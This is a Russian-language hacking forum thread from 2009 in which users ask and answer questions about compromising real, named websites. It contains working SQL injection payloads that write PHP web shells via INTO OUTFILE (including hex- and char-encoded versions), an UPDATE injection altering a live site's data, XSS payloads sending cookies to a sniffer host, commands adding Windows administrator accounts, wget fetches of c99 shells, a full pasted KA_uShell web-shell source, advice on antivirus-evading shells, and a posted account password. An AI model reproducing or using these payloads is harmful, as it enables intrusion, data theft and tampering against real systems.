Просмотр полной версии : Ваши вопросы по уязвимостям.
http://site.ru/index.php?cat=1-1%20union%20select%201,2,3,4,'%3C?php%20system($_G ET[cmd]);%20?%3E',6,7,8,9,10,11,12,13,14+into+outfile+'/var/www/kvartirant/data/www/kvartira.ru/shell.php'/*
уматно сайт спрятал =))
kvartira.ru -это не настоящее имя сайта))))
сайт спрятал более менее надежно... ато турки сам знаеш)))
HAXTA4OK
01.12.2009, 16:31
kvartira.ru -это не настоящее имя сайта))))
сайт спрятал более менее надежно... ато турки сам знаеш)))
Поищи папки на запись и не думай что когда выполниш запрос то у тебя не вылезит какая нить ошибка, то есть ошибка может и вылезит, но файл создаться, но как я понял ты его прямо в корень сайта пихаеш, поищи папку с картинками
блин, а я сижу, раскручиваю :)
kvartira.ru/xml/list_flats.php?id=195&lang=ru';update+flats_s+set+nrooms='0'+where+1=1;s elect+'1&sq_all=&rooms=&pr_doll_min=1&pr_doll_max=&live=&unlive=1
ты вчера помог! тебе могу настоящее имя кинуть в лс))) только в паблик сразу некидай...
p.r0phe.t
01.12.2009, 16:37
По соображениям Light'a выложу))
http://www.terratour.ru/ru/img/2.php?a=phpinfo(); :)
так где там админка не запороленая? =)
HAXTA4OK
01.12.2009, 16:43
так где там админка не запороленая? =)
выложить можно , но опасно :) и не буду, ибо там все просто, надо тока знать имя папки получается,и умееш ли ты с ним работать? :)
p.r0phe.t
01.12.2009, 16:46
выложить можно , но опасно :) и не буду, ибо там все просто, надо тока знать имя папки получается,и умееш ли ты с ним работать? :)
хм.
/ru/admin
/em/admin
не открывает ,хотя маднет кричит что они есть =)
а как ни странно
en/admin,которой в маднете нет, выдаёт окно для ввода логина/паса,но она запаролена
просвети,буду уметь работать )
выложить можно , но опасно :) и не буду, ибо там все просто, надо тока знать имя папки получается,и умееш ли ты с ним работать? :)
ну вот админка но она запаролена...
http://www.terratour.ru/ru/login/login.php
Jokester
01.12.2009, 16:47
Я что-то не пойму, РОА заняться нечем что-ли? В правилах темы написано по русски что шеллы в паблике запрещены, мы их долго тереть будем?
Totgeliebt
01.12.2009, 17:32
Фото альбомы > >
Дата: 01.01.1970
Добавлено:
Размер: x пикселов
Warning: filesize() [function.filesize]: stat failed for images/photoalbum/album_/ in /home/gamer/public_html/photogallery.php on line 68
Рахмер файла: Bytes
Комментариев: 0
Рейтинг: Пусто
Количество просмотров:
Посмотрите есть тут что плз :)
P.S Ногами не пинать, я чайничек)
Залил на сайт шелл, но доступ к индексу и другим файлам не имею,то есть не могу удалить,редак. и др. чмод 666, меняю на 777 - не меняется, помогите пж.
спс.
p.r0phe.t
01.12.2009, 18:03
Залил на сайт шелл, но доступ к индексу и другим файлам не имею,то есть не могу удалить,редак. и др. чмод 666, меняю на 777 - не меняется, помогите пж.
хы,только рут чмоды раздавать может =) повышай привилегии.
[x60]unu
01.12.2009, 18:06
Фото альбомы > >
Дата: 01.01.1970
Добавлено:
Размер: x пикселов
Warning: filesize() [function.filesize]: stat failed for images/photoalbum/album_/ in /home/gamer/public_html/photogallery.php on line 68
Рахмер файла: Bytes
Комментариев: 0
Рейтинг: Пусто
Количество просмотров:
Посмотрите есть тут что плз :)
P.S Ногами не пинать, я чайничек)
да-да сейчас я покажу свои экстрасенсорные способности и угадаю сайт!!!
У тебя тут есть путь, ты доволен???
поясните пожалуйста что такое "не запароленный пма под рутом "
Totgeliebt
01.12.2009, 18:12
unu']да-да сейчас я покажу свои экстрасенсорные способности и угадаю сайт!!!
У тебя тут есть путь, ты доволен???
тссс успокойся :) Вот посмотри пожалуйста
http://la2.sz.ru/photogallery.php?photo_id=1
Вот пользователь для проверки:
логин: caak111
пароль: 1q2w3e4r
p.r0phe.t
01.12.2009, 18:17
как "чистым" (не через инъект) скуль запросом залить шелл на сервер?
mailbrush
01.12.2009, 18:32
поясните пожалуйста что такое "не запароленный пма под рутом "
SQL - пользователь root не имеет пароля.
как "чистым" (не через инъект) скуль запросом залить шелл на сервер?
Так же, как и через инъект...
SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
поясните пожалуйста что такое "не запароленный пма под рутом "
пма-phpmyadmin я так понял...
p.r0phe.t
01.12.2009, 18:41
SQL - пользователь root не имеет пароля.
Так же, как и через инъект...
SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
Выкидывает
#1 - Can't create/write to file 'D:www uimgc.php' (Errcode: 22)
p.r0phe.t
01.12.2009, 18:42
Выкидывает
#1 - Can't create/write to file 'D:www uimgc.php' (Errcode: 22)
user - root
Так же, как и через инъект...
SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
Parse error: syntax error, unexpected '<' in D:\www\jo.php on line 2 как исправить?
mailbrush
01.12.2009, 19:08
Parse error: syntax error, unexpected '<' in D:\www\jo.php on line 2 как исправить?
Вообще то это было сделано для того, чтобы ты сам поправил, но ладно...
SELECT '<?=system($_GET["cmd"])?>' FROM table_name INTO OUTFILE '/var/www/shell.php'
Люди , ситауция -
залил через скуль шел на сайт .
сайт под виндовс .
при создании файла с содержимым - "<?php system($_GET['cmd']); ?>" и вызовом функции site.com/cmd.php?cmd=dir
ничего не отображается..что же делать ? как по рутать ..
Есть доступ и права на запись ко всему диску С:
думал сделать нечто такое --
net user Attacker 12345 /add
net localgroup Administrators Attacker /add
net localgroup Remotedesktopuser Attacker /add
,.. но вот не задача цмд не работает ..Что делоть? :confused:
DimOnOID
01.12.2009, 19:23
safe mode on?
Software: . PHP/5.2.10
uname -a: Windows NT 238878-WEB1 5.2 build 3790
IUSR_238878-WEB1
Safe-mode: OFF (not secure)
C:\ drwxrwxrwx
Free 125.12 GB of 136.69 GB (91.54%)
p.r0phe.t
01.12.2009, 19:28
http://site/cmd.php?cmd=wget http://madnet.name/files/download/9_c99madshell.php -O shell.php
http://site/cmd.php?cmd='wget http://madnet.name/files/download/9_c99madshell.php -O shell.php'
Не пишет в файл. Команда дир пашет.
помоему вгета нет в винде =)))
юзай фтп.
DimOnOID
01.12.2009, 19:42
Выполни phpinfo()
В disable_functions Есть что нить?
Как залить шелл в e-commerce?
mailbrush
01.12.2009, 19:46
Software: . PHP/5.2.10
uname -a: Windows NT 238878-WEB1 5.2 build 3790
IUSR_238878-WEB1
Safe-mode: OFF (not secure)
C:\ drwxrwxrwx
Free 125.12 GB of 136.69 GB (91.54%)
Прав нету пользователю создавать пользователей, наверно...
Прав нету пользователю создавать пользователей, наверно...
с чего такие выводы ? я же говорю что не выолняется cmd ,тоесть не выполняется даже листинг ..и залил я шел только после того как в скуле залил следующий код аплоадера \
/+--------------------------------+\\ \
| KA_uShell | \
| <KAdot Universal Shell> | \
| Version 0.1.6 | \
| 13.03.04 | \
| Author: KAdot <KAdot@ngs.ru> | \
|--------------------------------| \
\\+ +/ \
\
--> \
<html> \
<head> \
<title>KA_uShell 0.1.6</title> \
<style type="text/css"> \
<!-- \
body, table{font-family:Verdana; font-size:12px;} \
table {background-color:#EAEAEA; border-width:0px;} \
b {font-family:Arial; font-size:15px;} \
a{text-decoration:none;} \
--> \
</style> \
</head> \
<body> \
\
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication \
if (!isset($_SERVER['PHP_AUTH_USER'])) { \
header('WWW-Authenticate: Basic realm="KA_uShell"'); \
header('HTTP/1.0 401 Unauthorized'); \
exit;} \
\
else { \
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login) \
{ echo "Что надо?"; exit;} \
} \
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo " \
|<a href=$self?ac=shell>Shell</a>| \
|<a href=$self?ac=upload>File Upload</a>| \
|<a href=$self?ac=tools>Tools</a>| \
|<a href=$self?ac=eval>PHP Eval Code</a>| \
|<a href=$self?ac=whois>Whois</a>| \
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML \
<b>Shell</b> \
<table> \
<form action="$self" method="POST"> \
<input type="hidden" name="ac" value="shell"> \
<tr><td> \
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter"> \
</td></tr> \
<tr><td> \
<textarea cols="100" rows="25"> \
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML \
<b>PHP Eval Code</b> \
<table> \
<form method="POST" action="$self"> \
<input type="hidden" name="ac" value="eval"> \
<tr> \
<td><textarea name="ephp" rows="10" cols="60"></textarea></td> \
</tr> \
<tr> \
<td><input type="submit" value="Enter"></td> \
$tend \
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML \
<b>Tools</b> \
<table> \
<form method="POST" action="$self"> \
<input type="hidden" name="ac" value="tools"> \
<tr> \
<td> \
<input type="radio" name="tac" value="1">B64 Decode<br> \
<input type="radio" name="tac" value="2">B64 Encode<br><hr> \
<input type="radio" name="tac" value="3">md5 Hash \
</td> \
<td><textarea name="tot" rows="5" cols="42"></textarea></td> \
</tr> \
<tr> \
<td> </td> \
<td><input type="submit" value="Enter"></td> \
$tend \
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Раскодированный текст:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Кодированный текст:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Кодированный текст:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML \
<b>File Upload</b> \
<table> \
<form enctype="multipart/form-data" action="$self" method="POST"> \
<input type="hidden" name="ac" value="upload"> \
<tr> \
<td>Файло:</td> \
<td><input size="48" name="file" type="file"></td> \
</tr> \
<tr> \
<td>Папка:</td> \
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Послать"></td> \
$tend \
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Файло успешно загружен в папку $uploadfile\\n";
echo "Имя:" .$_FILES['file']['name']. "\\n";
echo "Размер:" .$_FILES['file']['size']. "\\n";
} else {
print "Не удаётся загрузить файло. Инфа:\\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML \
<b>Whois</b> \
<table> \
<form action="$self" method="POST"> \
<input type="hidden" name="ac" value="whois"> \
<tr> \
<td>Домен:</td> \
<td><input size="40" type="text" name="wq"></td> \
</tr> \
<tr> \
<td>Хуйз сервер:</td> \
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td> \
</tr> \
<tr><td> \
<input align="right" type="submit" value="Enter"> \
</td></tr> \
$tend \
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\\r\\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Не могу открыть сокет";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?> \
</pre> \
</body> \
</html>
- а уже тем аплоадером залил шелл , кстати во всех шеллах известных - r57 madshel c99 c100 не работает аплоад
mailbrush
01.12.2009, 22:52
Есть такой шелл... http://mailbrush.eu/shell.php Вопрос в том, где есть системные файлы??? В корене сайта даже намеков нету... Или это не корень? Поиск файла passwd показывает лишь ерунду какую-то... То есть не сис. файлы...
/www/phpBB2/includes/usercp_sendpasswd.php
/www/phpBB2/language/lang_en...ail/user_activate_passwd.tpl
/www/phpBB2/language/lang_po...ail/user_activate_passwd.tpl
/www/phpBB3/language/en/email/user_activate_passwd.txt
/www/phpBB3/language/pl/email/user_activate_passwd.txt
апд:
хм, они скрытые оказывается, т.к. cat /etc/passwd все норм показывает, и самое главное - если в шелле выбрать директорию /etc, то откроется нормально, но в списке директории "/" папки etc нету) кому интерестно - за шеллом в асю
Много инфы искал, так ничего не нашёл... Проблема заключается вот в чём: есть запрос в который записывается параметр id, например http://test.ru/a.php?id=1, я знаю, что это строка, когда я подставляю id=1', то получаю:
SELECT a,b,c FROM testtable WHERE id='1\''. И вот чего я не понимаю: как обойти добавление слэша???????????????????????????
mailbrush
02.12.2009, 01:40
Много инфы искал, так ничего не нашёл... Проблема заключается вот в чём: есть запрос в который записывается параметр id, например http://test.ru/a.php?id=1, я знаю, что это строка, когда я подставляю id=1', то получаю:
SELECT a,b,c FROM testtable WHERE id='1\''. И вот чего я не понимаю: как обойти добавление слэша???????????????????????????
Никак.
p.r0phe.t
02.12.2009, 06:21
почему запрос
SELECT '<?php system($_GET["cmd"]);?>' FROM `news` into outfile '/www/shell.php'
файл создаёт,но он пустой.
P.S. разобрался,таблицу не надо указывать.
Извините за глупость,но скажите,во что можно перекодировать php-код, чтобы в таком кодированном виде его интерпретатор всё-равно схавал?
почему запрос
SELECT '<?php system($_GET["cmd"]);?>' FROM `news` into outfile '/www/shell.php'
файл создаёт,но он пустой.
P.S. разобрался,таблицу не надо указывать.
Извините за глупость,но скажите,во что можно перекодировать php-код, чтобы в таком кодированном виде его интерпретатор всё-равно схавал?
в hex
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B3F3E FROM `news` into outfile '/www/shell.php'
или char
SELECT char(60,63,112,104,112,32,115,121,115,116,101,109, 40,36,95,71,69,84,91,34,99,109,100,34,93,41,59,63, 62) FROM `news` into outfile '/www/shell.php'
p.r0phe.t
02.12.2009, 08:11
в hex
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B3F3E FROM `news` into outfile '/www/shell.php'
или char
SELECT char(60,63,112,104,112,32,115,121,115,116,101,109, 40,36,95,71,69,84,91,34,99,109,100,34,93,41,59,63, 62) FROM `news` into outfile '/www/shell.php'
закодировал в хекс,при обращении тупо текст выдает.
пытаюсь залить шелл на сайт, как мне узнать путь куда можно залить свой файл. На сайте можно читать файлы.
p.r0phe.t
02.12.2009, 12:58
пытаюсь залить шелл на сайт, как мне узнать путь куда можно залить свой файл. На сайте можно читать файлы.
Найти бажный скрипт,который в тексте ошибки выдаст полный путь до директории сайта. Либо перебором через лоадфайл,что достаточно геморно.
p.r0phe.t
02.12.2009, 13:01
Скажите,можно ли залить полноценный шелл,например r57 через инто аутфайл,предварительно закодировав скрипт в hex? пробовал; при обращении к скрипту мыдаются ошибки,хотя простейший шелл для ввода команд спокойно работает в тех же условиях. в чём загвоздка?
p.r0phe.t, не извращайся, залей <? eval($_REQUEST['cmd']); ?> а потмо уже лей как тебе нравится! =)
З.Ы. Дай угадаю, ты еще гетом передавал весь захексенный скрипт шелла? =)
Найти бажный скрипт,который в тексте ошибки выдаст полный путь до директории сайта. Либо перебором через лоадфайл,что достаточно геморно.
часто выручает гугл
site:site.com "warn" итд , вобщем ищем ошибки :)
а вообще есть какието ограничения на количевство символов в строке....
ну в смысле когда через скулю into outfile'ом заливаеш скрипт шелла?
и еще такая конструкция <?php system($_GET['cmd']); ?> шелла сработает одинаково и на линукс сервере и на виндовс?
и wget работает и линукс и на виндовс сервере?
насколько знаю вгет это линукс качалка)
сильно не пинайте, но смотрел в ютубе видео и стало очень интересно - как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?
видео по адресу: __http://www.youtube.com/watch?v=MJNJjh4jORY
сильно не пинайте, но смотрел в ютубе видео и стало очень интересно - как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?
видео по адресу: __http://www.youtube.com/watch?v=MJNJjh4jORY
там же написано SQL инъекция
там же написано SQL инъекция
там могли написать "конь в пальто".
а я спросил
как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?
Jokester
02.12.2009, 15:10
там могли написать "конь в пальто".
а я спросил
как так может быть? и с чем это связано. как определить с какими сайтам такой трюк пройдет?
Отвечаю, так может быть очень просто, это связано с инъекцией, пройдёт с сайтами на которых есть такая инъекция.
Нормально так? Линки на статьи по скулям пхп и html нужны?
jokester
)) нормально! а линки думаю сам найду. просто хотел узнать: что за такая инъекция ? ))) здесь если можно - немного подорбно.
jokester
)) нормально! а линки думаю сам найду. просто хотел узнать: что за такая инъекция ? ))) здесь если можно - немного подорбно.
Обыкновенная инекция :/
where username = '' or 1=1;
первое условие не срабатывает,поэтому србатывает второе,заранее верное условие, 1=1.Помоему как то так.
Какой прогой можно криптонуть шелл?
штобы и код срабатывал и антивирем непалился)
[Forest]
02.12.2009, 19:46
Какой прогой можно криптонуть шелл?
штобы и код срабатывал и антивирем непалился)
wso (http://forum.antichat.ru/thread103155.html) вполне нормальный и не палится
Root-access
02.12.2009, 20:55
а вообще есть какието ограничения на количевство символов в строке....
ну в смысле когда через скулю into outfile'ом заливаеш скрипт шелла?
и еще такая конструкция <?php system($_GET['cmd']); ?> шелла сработает одинаково и на линукс сервере и на виндовс?
и wget работает и линукс и на виндовс сервере?
насколько знаю вгет это линукс качалка)
Количество символов в строке ограничивается сервером - обычно это около 4096 символов.
Но может быть ограничение и в самом скрипте.
Функци system() работает как в unix, так и в windows, только там команды шелла разные.
wget есть и под windows.
Количество символов в строке ограничивается сервером - обычно это около 4096 символов.
Но может быть ограничение и в самом скрипте.
Функци system() работает как в unix, так и в windows, только там команды шелла разные.
wget есть и под windows.
Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
']wso (http://forum.antichat.ru/thread103155.html) вполне нормальный и не палится
че -то не очень верю в это ! в моем случае не работает. я спросил здесь, мне сказали, что хост блокирует. (wso)
mailbrush
02.12.2009, 21:26
Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
http://www.google.com/search?q=windows+wget
http://users.ugent.be/~bpuype/cgi-bin/fetch.pl?dl=wget/wget-1.10.2.exe
Root-access
02.12.2009, 22:10
Я так понимаю,чтобы вигет был в окошка,нужно проводить сложные манипуляции.Ибо например как ХП так и Севен,говорят что такой команды не знают.Есть ли анаоги под виндовс? Или она к этому вообще не адаптирована,и придеться юзать фтп соединение через кмд? Тоже интересно для меян просто )
Ээ, ХП и Севен этой команды не знают, если wget не установлен. Если бы ты погуглил, ты бы увидел, что прога под вин есть, и даже есть GUI (http://sites.google.com/site/surfer56/wget)
А вот win32 сборка Льюиса (http://www.christopherlewis.com/WGet/default.htm)
http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>
если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))
в чем проблема?
http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>
если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))
в чем проблема?
вот так работает редирект с куками
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.assign(%22http ://ya.ru/%3F%22+document.cookie);%3C/script%3E%3C!--
короче нужно ? заменить на %3F
так же работает
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.href=%22http://site/sniff.php%3f%22+document.cookie;%3C/script%3E%3C!--
2AFoST спасибо
И такой еще вопрос, что дает возможность записи пхп кода в сессию???
2AFoST спасибо
И такой еще вопрос, что дает возможность записи пхп кода в сессию???
прямая посылка изменяимых даннх (пхп кодэ) юзверя от которого ты дейсвуешь видимо :(
2AFoST спасибо
И такой еще вопрос, что дает возможность записи пхп кода в сессию???
если есть локальный инклуд - даёт возможность инклудить код и испольнить его.
если есть локальный инклуд - даёт возможность инклудить код и испольнить его.
ок понял, жаль инклуда нету.
Как каталог в линукс заархивировать? (вместе с каталогами и файлами в нем)(с командами линукса не сталкивался)
Пробывал так:
tar -cz -f /var/www/site/www/file.tar.gz /var/www/site2/www/
Не пишет, т.е. архив создается но правильное заархивирование этой командой не получается
Подскажите вообщем
так необязательно архивировать через командную строку...
можно просто правой кнопкой мышы)
tar -czf backup.tgz /var/www/site2/www
']tar -czf backup.tgz /var/www/site2/www
Выполнил так:
tar -czf /var/www/site/www/file1.tgz /var/www/site2/www
Все такая же ошибка (архив поврежден)
Как каталог в линукс заархивировать? (вместе с каталогами и файлами в нем)(с командами линукса не сталкивался)
Пробывал так:
tar -cz -f /var/www/site/www/file.tar.gz /var/www/site2/www/
Не пишет, т.е. архив создается но правильное заархивирование этой командой не получается
Подскажите вообщем
http://www.opennet.ru/man.shtml?topic=tar&russian=0&category=&submit=%F0%CF%CB%C1%DA%C1%D4%D8+man
в мемориз
Нужно закачать архив .zip на сайт, где находится шелл - как? Вес его ~30-40 mb. собственно в этом и пробелма
[Forest]
03.12.2009, 20:56
Нужно закачать архив .zip на сайт, где находится шелл - как? Вес его ~30-40 mb. собственно в этом и пробелма
расбей на 3-4 части и залей
geezer.code
03.12.2009, 21:08
Выполнил так:
tar -czf /var/www/site/www/file1.tgz /var/www/site2/www
Все такая же ошибка (архив поврежден)
проверь достаточно ли свободного места на харде.
$ df
например.
проверь достаточно ли свободного места на харде.
$ df
например.
Достаточно места
Нужно закачать архив .zip на сайт, где находится шелл - как? Вес его ~30-40 mb. собственно в этом и пробелма
полю преватные мысли!!
1- нойти эфтепе пароли :
2- проверить можешь ли ты вообще писать что в дирру
3- есть такая тема - называется WGET - несудьба в другое место скачать- а потом вгетом вытянуть? :D
3.1 чтобы проверить можешь ли ты пользоваться вгетом- дай команду- which wget :o 00!!! если видишь что она есть- пегом качать закачаный архиф
4 Ды я нарег
Достаточно места
у тебя веб шеленг? какой породы? :confused:
x']у тебя веб шеленг? какой породы? :confused:
http://forum.antichat.ru/threadnav103155-1-10.html
(WSO)
http://forum.antichat.ru/threadnav103155-1-10.html
(WSO)
одажде быдли загоны- немог сдампить бд.. не конкретно этим шелом.- поставил другой- сдампил (r57 http://rstghc.livejournal.com/1494.html :) r57 вообще как бе правльный шел )
Здраствуйте.
Есть шелл на сайте, сайт 1 на сервере(сервер Windows NT SERVER 5.2 build 3790), есть доступ к бд, бд мускуль5 . Править файлы не могу,могу заливать свои.
Как получить доступ к серверу?
Если возможно залить бекдор, то расскажите пожалуйста как,или дайте ссыль?
Спасибо.
http://milw0rm.com/video/watch.php?id=90
на то он и блинд шоб не выводить!)
в скрипте мож вобще не стоять у тебя вывода результатов из базы
а блиндом мы внедряем логическое условие и смотрим шо будет
спрашываем гуру !!! кто нить может обяснить почему при blind данные не выводяться в браузере, они для других запросов используються или что !!!??? Я за технические особенности спрашываю, можно с примером например на ПХП что я вкурил... Так то понятно как ее роскрутить , на один символо кучу запоросов...
http://injection.rulezz.ru/
квазара почитай, зря он чтоле себе голву ломал :(
стоит только заглянуть в багтрак... вот реальный пример с OS CMS
$postid = $_GET['id'];
$result = mysql_query("SELECT * FROM myblog_posts WHERE title = '$postid'") or die(mysql_error());
while($row = mysql_fetch_array( $result )) {
$member = $row['name'];
}
Strilo4ka, ты же всякие ХУКЕРСКИЕ статьи для НОВЕЧКОВ пишешь, должен уже постичь все основы своего дела
Полный путь к папке доступной из Интернета знаешь? (document_root)
Если знаешь, выполни запрос:
Вот только может быть чмоды помешаеют.
а терь по полочкам:
1- Есть шелл на сайте
2- сайт 1 на сервере
3- сервер Windows NT SERVER 5.2 build 3790
4- есть доступ к бд
5- бд мускуль5
6- Править файлы не могу
7- могу заливать свои
вопрос к тебе Ctacok, нахуя ему еще один шел?
дооо, возможно просто тс невпонятках что такае задний проход :D ))
warlok прикольно, то что нужно ,а переменная $member. Для чего тогда она! ?
это вообще загадка....
$member = $row['name']; :D
епт.... иди на милворм, возьми пример, скачай уязвимую cms поставь на локалку, тести. а тк херли лясы точить?
Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx.
eD']Как можно использовать union select ... если запрос идет в UPDATE?
Тоесть например UPDATE `news` SET `title` = ' _тут не фильтруемая переменная_ ', `date` = '' ...
thx.
что за бд?
Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)
коротко:
File_Priv: Y
magic_quotes_off
Сервер:Apache/2.2.3 (Red Hat)
проблема: немогу раскрыть путь...
конструкция:
http://www.gsmtrack.nl/index.php?page[]=
недала нефига(
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+'%3C?php%20system($_GET['cmd']);%20?%3E'+into+outfile+'/var/www/'--
тут понятно тоже што нефига невыйшло так как путь.....
вообщем вся загвоздка в том што немогу путь раскрыть и (или) загрузить конфиги хотябы)...
Pashkela
04.12.2009, 17:17
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
<VirtualHost 213.206.88.15:80>
ServerName www.gsmtrack.nl
ServerAdmin webmaster@gsmtrack.nl
DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')--
<VirtualHost 213.206.88.15:80>
ServerName www.gsmtrack.nl
ServerAdmin webmaster@gsmtrack.nl
DocumentRoot /opt/guide/www.gsmtrack.nl/HTML
прикол) я пробовал так...
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
и у меня нераскрылось) спасибо!
но к сожалению
/opt/guide/www.gsmtrack.nl/HTML закрыт на запись из веба и /var/www/html тоже...
ты путь по конфигу вычислил?
schwarze
04.12.2009, 18:38
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
mailbrush
04.12.2009, 19:04
Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!
Если allow_url_include, то
http://google.com/?
Если нет, то
/proc/self/environ
Или автарки форумов, и тд...
Об этом уже писалось тут...
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
<script src="http:/* (Password: *///1.ru:73/1.js">
но скрипт то невыполняеться при таких условиях :(
слил файлик spwd.db
чем посоветуете выдрать логины и пароли и чем их лучше брутить??
З.Ы. если есть брутер для GPU типа PasswordsPro с лекарством, скиньте плиз ссылку в пм
Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
<script>alert('x')// (Password: </script>
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
<script src="http:/* (Password: *///1.ru:73/1.js">
но скрипт то невыполняеться при таких условиях :(
Так попробуй:
<script src="http:<!-- (Password: -->//1.ru:73/1.js">
если в JETDATABASE DRIVER есть скул на http header можно ли произвести инъекцию каким нибудь прогой? Например на referrer
Уважаемые Гуру, есть у меня один ну почти ламерский, расстраивающий меня вопрос. Нашел на сайте чтение файлов через readfile хочу шелл. Вначале о хорошем - уязвимость выводит и списки файлов в директориях.
Теперь о плохом. Во первых настройки пхп читать все что в голову взбредет не позволяют, только из нескольких папок. На сайте довольно много субдоменов но все абсолютно однотипные(кроме парочки). Нашел пхп скрипты с паролями-явками от БД - с наружи подключиться нельзя, других сайтов на сервере нету. Почитал несколько пхп файлов, но и в них ничего интереснее хсс пассивной не нашел. Теперь творческий кризис - не продолжать же методом научного тыка читать все файлы и искать инклюд или иньекцию, может есть какие-то другие варианты?
Jokester
05.12.2009, 13:50
Конфиги с явками и паролями, тыкать пароли на всё что можно или искать баги позволяющие сделать что-то более существенное в коде.
Тоесть простая читалка без дополнений не даст тебе ничего кроме очевидного -- чтения файлов.
Ищи админки, пыхадмины, возможно пароль от админки не в базе а в файле, тогда туда можно попасть, в пыхадмин тоже можно попасть пасс к БД у тебя есть, вопрос какая там авторизация стоит. Ну и т.д.
Вобщем читай )
Про пхпмайадмин спасибо, вот это я точно запамятовал. Пока не нашел его, но мб мне повезет. Зато уже третий набор логин-пароль от БД нашел. Есть еще надежда найти sql иньекцию - ибо судя по другим скриптам, те, кто писали этот сайт оч верят в intval. Буду продолжать искать, чую логи у сервера сегодня хорошо разрастутся. Надо попробовать еще с этими пассами по фтп подключаться, вдруг повезет.
']что за бд?
Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)
